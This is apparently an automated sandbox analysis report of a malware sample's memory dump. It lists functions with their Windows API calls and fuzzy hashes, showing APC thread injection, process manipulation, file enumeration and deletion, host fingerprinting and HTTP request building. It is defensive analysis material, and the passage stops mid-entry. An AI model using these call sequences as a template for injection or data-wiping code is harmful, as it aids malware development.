Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Open$Closememset
String ID:
API String ID: 1685373161-0
Opcode ID: fa2cae8f059db41adb030fb587d82601fbdc927be8d37751c18d98a0c73e278a
Instruction ID: 5c3d5b3afdda24d434b62b8bb680a7a227605916444943ca0d3d185babeffdf4
Opcode Fuzzy Hash: fa2cae8f059db41adb030fb587d82601fbdc927be8d37751c18d98a0c73e278a
Instruction Fuzzy Hash: 8CE08C30200218BBEB10BE80CD01F997B54AB18344F008008FE0C1B241EA31B664DB98

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 0462F8CE, Relevance: 28.7, APIs: 19, Instructions: 234stringfilesynchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

Part of subcall function 0463DF50: ExpandEnvironmentStringsW.KERNEL32(0463DF37,00000000,00000000,00000001,00000000,00000000,00000000,0463DF37,00000000,00000000,04639946,00000000,7711DBB0,00000020,00000000), ref: 0463DF67
Part of subcall function 0463DF50: ExpandEnvironmentStringsW.KERNEL32(0463DF37,00000000,00000000,00000000), ref: 0463DF81

lstrlenW.KERNEL32(?,73BCFC30,745EC740,?,00000250,?,00000000), ref: 0462F91A
lstrlenW.KERNEL32(?,?,00000000), ref: 0462F926
memset.NTDLL ref: 0462F96E
FindFirstFileW.KERNEL32(00000000,00000000), ref: 0462F989
lstrlenW.KERNEL32(0000002C), ref: 0462F9C1
lstrlenW.KERNEL32(?), ref: 0462F9C9
memset.NTDLL ref: 0462F9EC
wcscpy.NTDLL ref: 0462F9FE
PathFindFileNameW.SHLWAPI(0000001C,?,?,?,?,00000000), ref: 0462FA24
RtlEnterCriticalSection.NTDLL(?), ref: 0462FA5A

Part of subcall function 04641844: HeapFree.KERNEL32(00000000,?,0463DF8D,00000000), ref: 04641850

RtlLeaveCriticalSection.NTDLL(?), ref: 0462FA76
FindNextFileW.KERNEL32(?,00000000), ref: 0462FA8F
WaitForSingleObject.KERNEL32(00000000), ref: 0462FAA1
FindClose.KERNEL32(?), ref: 0462FAB6
FindFirstFileW.KERNEL32(00000000,00000000), ref: 0462FACA
lstrlenW.KERNEL32(0000002C), ref: 0462FAEC
FindNextFileW.KERNEL32(?,00000000), ref: 0462FB62
WaitForSingleObject.KERNEL32(00000000), ref: 0462FB74
FindClose.KERNEL32(?), ref: 0462FB8F

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Find$Filelstrlen$CloseCriticalEnvironmentExpandFirstHeapNextObjectSectionSingleStringsWaitmemset$AllocateEnterFreeLeaveNamePathwcscpy
String ID:
API String ID: 2962561936-0
Opcode ID: cecb07dcbfb2be89359e1e2430f1ad72c16e819a48b9c27968856707364f9ad4
Instruction ID: 26e030349d68f4083dd8aaa2be4c18f1297f96469b8cea10c17b17995e8a3677
Opcode Fuzzy Hash: cecb07dcbfb2be89359e1e2430f1ad72c16e819a48b9c27968856707364f9ad4
Instruction Fuzzy Hash: C08186B1504716AFDB14AF24DD84A5BBBF8FF98308F004829F88582252EB78E8459F52

Uniqueness

Uniqueness Score: -1.00%

Function 04625210, Relevance: 16.6, APIs: 11, Instructions: 130libraryloadernativeCOMMON

Download Yara Rule

APIs

OpenProcess.KERNEL32(001F0FFF,00000000,?), ref: 04625243
GetLastError.KERNEL32 ref: 04625251
NtSetInformationProcess.NTDLL ref: 046252AB
GetProcAddress.KERNEL32(456C7452,00000000), ref: 046252EA
GetProcAddress.KERNEL32(61657243), ref: 0462530B
TerminateThread.KERNEL32(?,00000000,?,00000004,00000000), ref: 04625362
CloseHandle.KERNEL32(?), ref: 04625378
CloseHandle.KERNEL32(?), ref: 0462539E

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: AddressCloseHandleProcProcess$ErrorInformationLastOpenTerminateThread
String ID:
API String ID: 3529370251-0
Opcode ID: b5c21f562c0f6b4e36e81374d511ed7b498573bfcf4fde8cfe7a166735f1e849
Instruction ID: 274b638c01a4ff2166198ff8b2c89b9af56b2b5d08fa2a360ac92c0e4deb02f6
Opcode Fuzzy Hash: b5c21f562c0f6b4e36e81374d511ed7b498573bfcf4fde8cfe7a166735f1e849
Instruction Fuzzy Hash: 6441AA74108755BFDB219F60C948A2BBBE4FBC8718F001A2DF95696250F7B4AA48CF52

Uniqueness

Uniqueness Score: -1.00%

Function 0462FD33, Relevance: 16.6, APIs: 11, Instructions: 94memorystringsynchronizationCOMMON

Download Yara Rule

APIs

wcscpy.NTDLL ref: 0462FD67
GetLogicalDriveStringsW.KERNEL32(00000000,00000000), ref: 0462FD73
RtlAllocateHeap.NTDLL(00000000,?), ref: 0462FD84
memset.NTDLL ref: 0462FDA1
GetLogicalDriveStringsW.KERNEL32(?,?), ref: 0462FDAF
WaitForSingleObject.KERNEL32(00000000), ref: 0462FDBD
GetDriveTypeW.KERNEL32(?), ref: 0462FDCB
lstrlenW.KERNEL32(?), ref: 0462FDD7
wcscpy.NTDLL ref: 0462FDE9
lstrlenW.KERNEL32(?), ref: 0462FE03
HeapFree.KERNEL32(00000000,?), ref: 0462FE1C

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Drive$HeapLogicalStringslstrlenwcscpy$AllocateFreeObjectSingleTypeWaitmemset
String ID:
API String ID: 3888849384-0
Opcode ID: 5878e5b2249fb64edb8150a3cd2fd23bef5f9081db3448de7b51caded85c29e0
Instruction ID: 601b6211d4aa74cf0a088404b9c3e955555455f81e2eec4763dc61e3347a6836
Opcode Fuzzy Hash: 5878e5b2249fb64edb8150a3cd2fd23bef5f9081db3448de7b51caded85c29e0
Instruction Fuzzy Hash: E5317A7A800118BFDF01AFA4ED85CEEBBBCEB48314B108426E101E3111EB39AE559F60

Uniqueness

Uniqueness Score: -1.00%

Function 04632517, Relevance: 15.1, APIs: 10, Instructions: 68threadprocesslibraryCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(?,00000000,?,00000000), ref: 0463253D
CreateToolhelp32Snapshot.KERNEL32(00000004,00000000), ref: 04632549
GetModuleHandleA.KERNEL32(4E52454B,05D39822,00000000,?,00000000), ref: 04632569
GetProcAddress.KERNEL32(00000000), ref: 04632570
Thread32First.KERNEL32(?,0000001C), ref: 04632580
OpenThread.KERNEL32(001F03FF,00000000,?), ref: 0463259B
QueueUserAPC.KERNEL32(00000001,00000000,00000000), ref: 046325AC
CloseHandle.KERNEL32(00000000), ref: 046325B3
Thread32Next.KERNEL32(?,0000001C), ref: 046325BC
CloseHandle.KERNEL32(?), ref: 046325C8

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Handle$Close$Thread32$AddressCreateFirstModuleNextOpenProcQueueSnapshotThreadToolhelp32User
String ID:
API String ID: 2341152533-0
Opcode ID: 9f47a7b832b4e6b05e5dbfb53449bf697d62347e4be111a1051bc8092d5daff1
Instruction ID: 12a3f33501ec0990ac6327979eed8df70d1edd673ca8ff2e4c26025c658c1b78
Opcode Fuzzy Hash: 9f47a7b832b4e6b05e5dbfb53449bf697d62347e4be111a1051bc8092d5daff1
Instruction Fuzzy Hash: A0219376900158FFDF00AFE0DC95DEE7BB9EB58755B004025FA01A7150FB34AE458B60

Uniqueness

Uniqueness Score: -1.00%

Function 04639F9E, Relevance: 12.1, APIs: 8, Instructions: 111stringfileCOMMON

Download Yara Rule

APIs

Part of subcall function 04622619: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,?,00000000,?,04639FDB), ref: 0462262A
Part of subcall function 04622619: ExpandEnvironmentStringsW.KERNEL32(?,00000000,00000000,00000000,?,04639FDB), ref: 04622647

FreeLibrary.KERNEL32(?), ref: 0463A0D4

Part of subcall function 04638AF9: lstrlenW.KERNEL32(?,00000000,?,?,?,0463A019,?,00550025), ref: 04638B06
Part of subcall function 04638AF9: GetCurrentDirectoryW.KERNEL32(00007FFF,00000000,00010012,?,?,?,0463A019,?,00550025), ref: 04638B2F
Part of subcall function 04638AF9: lstrcpyW.KERNEL32(-0000FFFE,?), ref: 04638B4F
Part of subcall function 04638AF9: lstrcpyW.KERNEL32(-00000002,0073006E), ref: 04638B6B
Part of subcall function 04638AF9: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0463A019,?,00550025), ref: 04638B77
Part of subcall function 04638AF9: LoadLibraryW.KERNEL32(-0000FFFE,?,?,?,?,0463A019,?,00550025), ref: 04638B7A
Part of subcall function 04638AF9: SetCurrentDirectoryW.KERNEL32(?,?,?,?,?,0463A019,?,00550025), ref: 04638B86
Part of subcall function 04638AF9: GetProcAddress.KERNEL32(00000000,5F53534E), ref: 04638BA3
Part of subcall function 04638AF9: GetProcAddress.KERNEL32(00000000,5F53534E), ref: 04638BBD
Part of subcall function 04638AF9: GetProcAddress.KERNEL32(00000000,31314B50), ref: 04638BD3
Part of subcall function 04638AF9: GetProcAddress.KERNEL32(00000000,31314B50), ref: 04638BE9
Part of subcall function 04638AF9: GetProcAddress.KERNEL32(00000000,31314B50), ref: 04638BFF
Part of subcall function 04638AF9: GetProcAddress.KERNEL32(00000000,31314B50), ref: 04638C15

FindFirstFileW.KERNEL32(?,?,?,00550025), ref: 0463A02A
lstrlenW.KERNEL32(00500025), ref: 0463A046
lstrlenW.KERNEL32(?), ref: 0463A05E

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

lstrcpyW.KERNEL32(00000000,00500025), ref: 0463A077
lstrcpyW.KERNEL32(00000002), ref: 0463A08C

Part of subcall function 0462376C: lstrlenW.KERNEL32(?,00000000,73BB8250,73B769A0,?,?,?,0463A09C,?,00000000,00000001), ref: 0462377C
Part of subcall function 0462376C: WideCharToMultiByte.KERNEL32(00000000,00000000,?,00000001,00000000,00000001,00000000,00000000,00000001,?,?,?,0463A09C,?,00000000,00000001), ref: 0462379E
Part of subcall function 0462376C: lstrcpyW.KERNEL32(00000000,?), ref: 046237CA
Part of subcall function 0462376C: lstrcatW.KERNEL32(00000000,006C005C), ref: 046237DD

FindNextFileW.KERNEL32(?,00000010), ref: 0463A0B4
FindClose.KERNEL32(00000002), ref: 0463A0C2

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: AddressProc$lstrcpy$lstrlen$CurrentDirectoryFind$EnvironmentExpandFileLibraryStrings$AllocateByteCharCloseFirstFreeHeapLoadMultiNextWidelstrcat
String ID:
API String ID: 1209511739-0
Opcode ID: a26b1175508a8565da22fd4eb1ccbca26168e53ab7fe0ae2f2e28fa76d5e2545
Instruction ID: aadca3d049a2ba27cb51d14d1e650ba513250de093bf93366a72e3ef6b63de31
Opcode Fuzzy Hash: a26b1175508a8565da22fd4eb1ccbca26168e53ab7fe0ae2f2e28fa76d5e2545
Instruction Fuzzy Hash: C7416D714043529FDB11EFA0DC44A6FBBE9FBD9719F04082DF580A2250EB34E9599B92

Uniqueness

Uniqueness Score: -1.00%

Function 0462FEC2, Relevance: 10.6, APIs: 7, Instructions: 109filestringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(?,00000000), ref: 0462FEDA

Part of subcall function 0464182F: RtlAllocateHeap.NTDLL(00000000,00000000,0463DF1F), ref: 0464183B

FindFirstFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 0462FF43
lstrlenW.KERNEL32(0000002C,?,0000000A,00000208), ref: 0462FF6B
RemoveDirectoryW.KERNEL32(?,?,0000000A,00000208), ref: 0462FFBD
DeleteFileW.KERNEL32(?,?,0000000A,00000208), ref: 0462FFC8
FindNextFileW.KERNEL32(?,00000000,?,0000000A,00000208), ref: 0462FFDB

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: File$Findlstrlen$AllocateDeleteDirectoryFirstHeapNextRemove
String ID:
API String ID: 499515686-0
Opcode ID: 74959a75dfdd8e229fb4246d584d8d836ed34d40b59d143c688866b6bd0da144
Instruction ID: 88d2db3bcb9882b702433a2bc1ecfff118d92029c4f11d1dd074990733914e27
Opcode Fuzzy Hash: 74959a75dfdd8e229fb4246d584d8d836ed34d40b59d143c688866b6bd0da144
Instruction Fuzzy Hash: FB418C7190061AFFDF11AFA0CD49AEE7BB9FF41318F104165E910A6290FB34AA94EF50

Uniqueness

Uniqueness Score: -1.00%

Function 04622239, Relevance: 9.1, APIs: 6, Instructions: 91memoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,0463D053), ref: 04622276
HeapFree.KERNEL32(00000000,?,?,?,?,?,?,0463D053,?,046247DB,05D3C0DC,745EC740,00000000,046304D5), ref: 046222A7
GetComputerNameW.KERNEL32(00000000,0463D053), ref: 046222B5
RtlAllocateHeap.NTDLL(00000000,0463D053), ref: 046222CC
GetComputerNameW.KERNEL32(00000000,0463D053), ref: 046222DD
HeapFree.KERNEL32(00000000,00000000,?,?,?,?,?,0463D053,?,046247DB,05D3C0DC,745EC740,00000000,046304D5), ref: 046222FE

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$AllocateComputerFreeName
String ID:
API String ID: 3439771632-0
Opcode ID: 2850959bfcdb297475c603ee5763d4349f1dfdc15635d1095ea564e656e850df
Instruction ID: f0d45b0b0d14e95bf3045bfbfa96ceffda075420cc2401b754f1cd0cf6a75437
Opcode Fuzzy Hash: 2850959bfcdb297475c603ee5763d4349f1dfdc15635d1095ea564e656e850df
Instruction Fuzzy Hash: 7C311ABAA00209FFDB00DFA4DD859AEBBF9EB98315B508469E501D3210EB34AE519F10

Uniqueness

Uniqueness Score: -1.00%

Function 0462DE4B, Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 101COMMON

Download Yara Rule

APIs

memset.NTDLL ref: 0462DE6D

Part of subcall function 0462F19E: RtlNtStatusToDosError.NTDLL(00000000), ref: 0462F1D6
Part of subcall function 0462F19E: SetLastError.KERNEL32(00000000), ref: 0462F1DD

GetLastError.KERNEL32(?,00000318,00000008), ref: 0462DF7D

Part of subcall function 0463B338: RtlNtStatusToDosError.NTDLL(00000000), ref: 0463B350

memcpy.NTDLL(00000218,046428A0,00000100,?,00010003,?,?,00000318,00000008), ref: 0462DEFC
RtlNtStatusToDosError.NTDLL(00000000), ref: 0462DF56

Strings

, xrefs: 0462DEC3

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Error$Status$Last$memcpymemset
String ID:
API String ID: 945571674-3916222277
Opcode ID: 3b3bdabd66e5047d170484002acad1b8717dc696802f99181975046bef429800
Instruction ID: f0e68e9d2683f687e83dc1f7c91b37a12772beacdadf5f25d419f1b0ce3c5e5c
Opcode Fuzzy Hash: 3b3bdabd66e5047d170484002acad1b8717dc696802f99181975046bef429800
Instruction Fuzzy Hash: F8319F7190061ABFEB20DF64DA88AAAB7B9FB14354F10456AE505E7240FB30FE44CF54

Uniqueness

Uniqueness Score: -1.00%

Function 0462981E, Relevance: 6.1, APIs: 4, Instructions: 114stringnativeCOMMON

Download Yara Rule

APIs

NtQueryKey.NTDLL(?,00000003,00000000,00000000,?), ref: 04629874
lstrlenW.KERNEL32(?), ref: 04629882
NtQueryKey.NTDLL(?,00000003,00000000,?,?), ref: 046298AD
lstrcpyW.KERNEL32(00000006,00000000), ref: 046298DB

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Query$lstrcpylstrlen
String ID:
API String ID: 3961825720-0
Opcode ID: 75fa4b293ec17fd942529b83b43ec9fe06778d080b6e8839fd766bc873cee44a
Instruction ID: 3d7b66b9e910db5fe063bbdcdd09d7612e3414d18e4a36041646c7b1059f2035
Opcode Fuzzy Hash: 75fa4b293ec17fd942529b83b43ec9fe06778d080b6e8839fd766bc873cee44a
Instruction Fuzzy Hash: 43415CB1A00619FFEF119FA4C984AAE7BA8FF94314F044069F905A7250EB74EA15DF50

Uniqueness

Uniqueness Score: -1.00%

Function 046217C3, Relevance: 6.0, APIs: 4, Instructions: 45pipeCOMMON

Download Yara Rule

APIs

CreateNamedPipeA.KERNEL32(40000003,00000004,000000FF,00000100,00000100,00000000,04648168,00000001), ref: 046217E7
GetLastError.KERNEL32(?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 04621832

Part of subcall function 0463D885: CreateThread.KERNEL32(00000000,00000000,00000000,046392F6,00000000,0463CC92), ref: 0463D89C
Part of subcall function 0463D885: QueueUserAPC.KERNEL32(046392F6,00000000,046243F3,?,046392F6,046243F3,00000000,?), ref: 0463D8B1
Part of subcall function 0463D885: GetLastError.KERNEL32(00000000,?,046392F6,046243F3,00000000,?), ref: 0463D8BC
Part of subcall function 0463D885: TerminateThread.KERNEL32(00000000,00000000,?,046392F6,046243F3,00000000,?), ref: 0463D8C6
Part of subcall function 0463D885: CloseHandle.KERNEL32(00000000,?,046392F6,046243F3,00000000,?), ref: 0463D8CD
Part of subcall function 0463D885: SetLastError.KERNEL32(00000000,?,046392F6,046243F3,00000000,?), ref: 0463D8D6

GetLastError.KERNEL32(Function_0001091E,00000000,00000000,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 0462181A
CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,04637FB0,?,?,?,?,4D283A53), ref: 0462182A

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: ErrorLast$CloseCreateHandleThread$NamedPipeQueueTerminateUser
String ID:
API String ID: 1700061692-0
Opcode ID: 82254d59ef9510244e713eb5677d21b8b88ff44ccd0398f4d7b0d60c2b1031c6
Instruction ID: d3b26a6d73135a807a974d24460879ba90fa6adc7f5de4476e9d4089fa6692b0
Opcode Fuzzy Hash: 82254d59ef9510244e713eb5677d21b8b88ff44ccd0398f4d7b0d60c2b1031c6
Instruction Fuzzy Hash: 56F0F4793056507FE7206BA89C89BB63658EB86735B040135FA66C32C0FA741C16CA74

Uniqueness

Uniqueness Score: -1.00%

Function 046326C2, Relevance: 1.6, APIs: 1, Instructions: 57processCOMMON

Download Yara Rule

APIs

CreateProcessAsUserW.KERNEL32(?,?,?,?,?,?,?,?,?,?,?), ref: 04632732

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: CreateProcessUser
String ID:
API String ID: 2217836671-0
Opcode ID: 2d5b215d8c32bc627feac507a830bafa42b2223911165424a1479172396f3b0f
Instruction ID: 173ece4d75c85eb0615264c1fad72de560b11b11e8db561189e6df4d4cc664d4
Opcode Fuzzy Hash: 2d5b215d8c32bc627feac507a830bafa42b2223911165424a1479172396f3b0f
Instruction Fuzzy Hash: A9110F36200289BFDF024F98DD10DEA3F6AFF58365B054215FA1852120E732E871AB90

Uniqueness

Uniqueness Score: -1.00%

Function 0462CFEA, Relevance: 47.5, APIs: 26, Strings: 1, Instructions: 237filememoryCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,00001000,00000000), ref: 0462D008
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000080,00000000), ref: 0462D02B
StrRChrA.SHLWAPI(00000000,00000000,0000005C), ref: 0462D043
wsprintfA.USER32 ref: 0462D070
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0462D081
wsprintfA.USER32 ref: 0462D0A6
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,00000000), ref: 0462D0B7
GetFileAttributesA.KERNEL32(00000008,?,?,?,?,?,?,?,00000000), ref: 0462D0BC
wsprintfA.USER32 ref: 0462D0D8
WriteFile.KERNEL32(?,?,00000000,?,00000000,?,?,?,?,?,?,?,?,?,?,00000000), ref: 0462D0E9
GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,00000000), ref: 0462D0F7
CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,00000000), ref: 0462D283
GetLastError.KERNEL32 ref: 0462D28B
HeapFree.KERNEL32(00000000,?), ref: 0462D29E

Strings

"%S", xrefs: 0462D21C

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: File$Writewsprintf$ErrorHeapLast$AllocateAttributesCloseCreateFreeHandle
String ID: "%S"
API String ID: 3254920416-1166868603
Opcode ID: 4365e43e546012eb8126d0a117994901d49c0db3320d3056a53246201d560d8f
Instruction ID: 4341fb80b6617de159560f46fc9b0642b28a9076b5d418002091f78cc7a13e46
Opcode Fuzzy Hash: 4365e43e546012eb8126d0a117994901d49c0db3320d3056a53246201d560d8f
Instruction Fuzzy Hash: 6C9136B9900209BFDF019FA4DC85DAE7BB8FF48344B008425F905A7260FB35AA65CF60

Uniqueness

Uniqueness Score: -1.00%

Function 0463037C, Relevance: 42.3, APIs: 28, Instructions: 262memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 0463039D
GetTickCount.KERNEL32 ref: 046303B7
wsprintfA.USER32 ref: 0463040A
QueryPerformanceFrequency.KERNEL32(?), ref: 04630416
QueryPerformanceCounter.KERNEL32(?), ref: 04630421
_aulldiv.NTDLL(?,?,?,?), ref: 04630437
wsprintfA.USER32 ref: 0463044D
wsprintfA.USER32 ref: 04630472
HeapFree.KERNEL32(00000000,?), ref: 04630485
wsprintfA.USER32 ref: 046304A9
HeapFree.KERNEL32(00000000,?), ref: 046304BC
wsprintfA.USER32 ref: 046304F6
wsprintfA.USER32 ref: 0463051A
lstrcat.KERNEL32(?,726F7426), ref: 04630552

Part of subcall function 04628114: WaitForSingleObject.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000008,?,00000000,00000000,?,?,?,0463A5C8,?,?), ref: 046281D4

RtlAllocateHeap.NTDLL(00000000,00000800), ref: 0463056C
GetTickCount.KERNEL32 ref: 0463057C
RtlEnterCriticalSection.NTDLL(05D3C0A0), ref: 04630590
RtlLeaveCriticalSection.NTDLL(05D3C0A0), ref: 046305AE
StrTrimA.SHLWAPI(00000000,046443E8,00000000,05D3C0E0), ref: 046305E7
lstrcpy.KERNEL32(00000000,?), ref: 04630609
lstrcpy.KERNEL32(00000000,00000000), ref: 04630610
lstrcat.KERNEL32(00000000,?), ref: 04630617
lstrcat.KERNEL32(00000000,?), ref: 0463061E
HeapFree.KERNEL32(00000000,?,00000000,?,?,?,?,00000001), ref: 04630699
HeapFree.KERNEL32(00000000,?,00000000), ref: 046306AB
HeapFree.KERNEL32(00000000,00000000,00000000,05D3C0E0), ref: 046306BA
HeapFree.KERNEL32(00000000,00000000), ref: 046306CC
HeapFree.KERNEL32(00000000,?), ref: 046306DE

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$wsprintf$lstrcat$AllocateCountCriticalPerformanceQuerySectionTicklstrcpy$CounterEnterFrequencyLeaveObjectSingleTrimWait_aulldiv
String ID:
API String ID: 3322690043-0
Opcode ID: bbc8f1e1dc10eb282078e875cd741e294687b3ccc6709f2e072d703f1c55a7b1
Instruction ID: 968cb61aedad13792f030e9edfdf40b4965a4176a2fee460cd5eea3dd6e5391b
Opcode Fuzzy Hash: bbc8f1e1dc10eb282078e875cd741e294687b3ccc6709f2e072d703f1c55a7b1
Instruction Fuzzy Hash: 2AA15979200206AFDF01EFA8EC85E5A3BE8EB99705F045419F504D3261FB39E869CF95

Uniqueness

Uniqueness Score: -1.00%

Function 0463BB72, Relevance: 37.1, APIs: 15, Strings: 6, Instructions: 389memorystringCOMMON

Download Yara Rule

APIs

lstrlen.KERNEL32(0A0D0A0D,?,046480F0), ref: 0463BBD4
RtlAllocateHeap.NTDLL(00000000,0464807D,?), ref: 0463BC70
lstrcpyn.KERNEL32(00000000,?,0464807D,?,046480F0), ref: 0463BC85
HeapFree.KERNEL32(00000000,00000000,?,046480F0), ref: 0463BCA0
StrChrA.SHLWAPI(?,00000020,?,00000000,00000000,?,00000000,?,0464807C,?,?,046480F0), ref: 0463BD87
StrChrA.SHLWAPI(00000001,00000020,?,046480F0), ref: 0463BD98
lstrlen.KERNEL32(00000000,?,046480F0), ref: 0463BDAC
memmove.NTDLL(0464807D,?,00000001,?,046480F0), ref: 0463BDBC
lstrlen.KERNEL32(?,?,00000000,00000000,?,00000000,?,0464807C,?,?,046480F0), ref: 0463BDE8
RtlAllocateHeap.NTDLL(00000000,?), ref: 0463BE0E
memcpy.NTDLL(00000000,?,?,?,046480F0), ref: 0463BE22
memcpy.NTDLL(0464807C,?,?,?,046480F0), ref: 0463BE42
HeapFree.KERNEL32(00000000,0464807C,?,?,?,?,?,?,?,?,046480F0), ref: 0463BE7E
RtlAllocateHeap.NTDLL(00000000,00000000), ref: 0463BF44
HeapFree.KERNEL32(00000000,00000000), ref: 0463BF8C

Strings

POST, xrefs: 0463BBA5
OPTI, xrefs: 0463BD7C
PUT , xrefs: 0463BB9E
GET , xrefs: 0463BD74
GET , xrefs: 0463BB97
OPTI, xrefs: 0463BBAC

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$AllocateFreelstrlen$memcpy$lstrcpynmemmove
String ID: GET $GET $OPTI$OPTI$POST$PUT
API String ID: 3227826163-647159250
Opcode ID: e06d74a674120942b6c1bcbfbe0892c85dbbd54f15372e9838c4d0502fd1cc21
Instruction ID: fd678ae76b13158095a098b6250d6359bea972e0a9e11e99eebd255c374668c2
Opcode Fuzzy Hash: e06d74a674120942b6c1bcbfbe0892c85dbbd54f15372e9838c4d0502fd1cc21
Instruction Fuzzy Hash: AAE15775A00645EFDF15DFA8C884AAABBB8FF44B02F048459F9159B252EB34FA50CF50

Uniqueness

Uniqueness Score: -1.00%

Function 04631552, Relevance: 33.2, APIs: 22, Instructions: 250memorystringCOMMON

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL ref: 04631588
wsprintfA.USER32 ref: 046315F0
wsprintfA.USER32 ref: 04631636
wsprintfA.USER32 ref: 04631657
lstrcat.KERNEL32(00000000,726F7426), ref: 04631688
wsprintfA.USER32 ref: 046316B5
HeapFree.KERNEL32(00000000,?), ref: 046316C8
wsprintfA.USER32 ref: 046316E7
HeapFree.KERNEL32(00000000,?), ref: 046316F8
RtlAllocateHeap.NTDLL(00000000,00000800), ref: 04631712
RtlEnterCriticalSection.NTDLL(05D3C0A0), ref: 0463172B
RtlLeaveCriticalSection.NTDLL(05D3C0A0), ref: 04631749

Part of subcall function 04631E2D: lstrlen.KERNEL32(00000000,253D7325,00000000,745EC740,73BB81D0,?,?,046305C4,00000000,05D3C0E0), ref: 04631E58
Part of subcall function 04631E2D: lstrlen.KERNEL32(?,?,?,046305C4,00000000,05D3C0E0), ref: 04631E60
Part of subcall function 04631E2D: strcpy.NTDLL ref: 04631E77
Part of subcall function 04631E2D: lstrcat.KERNEL32(00000000,?), ref: 04631E82
Part of subcall function 04631E2D: StrTrimA.SHLWAPI(00000000,=,00000000,00000000,?,?,?,046305C4,00000000,05D3C0E0), ref: 04631E9F

StrTrimA.SHLWAPI(00000000,046443E8,00000000,05D3C0E0), ref: 0463177F

Part of subcall function 0463764C: lstrlen.KERNEL32(05D39A76,00000000,00000000,73BB81D0,046305F3,00000000), ref: 0463765C
Part of subcall function 0463764C: lstrlen.KERNEL32(?), ref: 04637664
Part of subcall function 0463764C: lstrcpy.KERNEL32(00000000,05D39A76), ref: 04637678
Part of subcall function 0463764C: lstrcat.KERNEL32(00000000,?), ref: 04637683

lstrcpy.KERNEL32(00000000,?), ref: 046317A2
lstrcpy.KERNEL32(00000000,00000000), ref: 046317A9
lstrcat.KERNEL32(00000000,?), ref: 046317B6
lstrcat.KERNEL32(00000000,?), ref: 046317BD
HeapFree.KERNEL32(00000000,?,00000000,00000000,00000000,?), ref: 0463183D
HeapFree.KERNEL32(00000000,00000000,00000000), ref: 0463184C
HeapFree.KERNEL32(00000000,00000000,00000000,05D3C0E0), ref: 04631857
HeapFree.KERNEL32(00000000,00000000), ref: 04631865
HeapFree.KERNEL32(00000000,00000000), ref: 04631870

Memory Dump Source

Source File: 00000003.00000002.936413529.0000000004620000.00000040.00000001.sdmp, Offset: 04620000, based on PE: false

Similarity

API ID: Heap$Free$lstrcatwsprintf$lstrlen$lstrcpy$AllocateCriticalSectionTrim$EnterLeavestrcpy
String ID:
API String ID: 697741160-0
Opcode ID: fa92271e041abcdc6ca04510ddb7537e00ae0380e425990aea715cbf136b1aca
Instruction ID: 50e37626d2b11cd50f09fe05e4229cec660fb9330127f4d4cdd12c70af1dcb53
Opcode Fuzzy Hash: fa92271e041abcdc6ca04510ddb7537e00ae0380e425990aea715cbf136b1aca
Instruction Fuzzy Hash: FC91B979601205AFDB41AFA8DC80F5A7BE8EB89B05F042419F505D7261FB38EC15CFA5

Uniqueness

Uniqueness Score: -1.00%

Function 04631A2C, Relevance: 30.0, APIs: 16, Strings: 1, Instructions: 219memoryfilestringCOMMON

Download Yara Rule

APIs

